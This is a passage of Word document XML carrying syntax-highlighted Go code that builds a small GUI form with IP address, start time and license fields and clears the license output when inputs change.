          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6FAFBD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t xml:space="preserve">IpAddressOut := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewLabel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"IP address"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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t xml:space="preserve">IpAddressIn := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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t xml:space="preserve">TimeOut := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewLabel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Start time"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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t xml:space="preserve">TimeIn := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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t xml:space="preserve">LicenseLabel := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewLabel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"License"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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t xml:space="preserve">LicenseOut := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>widget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewEntry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>逻辑部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">IpAddressIn.OnChanged = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(content </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t>LicenseOut.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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t>}</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t xml:space="preserve">TimeIn.OnChanged = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(content </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) {</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t>LicenseOut.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</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t>}</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IpAddressOut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IpAddressIn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TimeOut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>TimeIn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LicenseLabel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LicenseOut</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
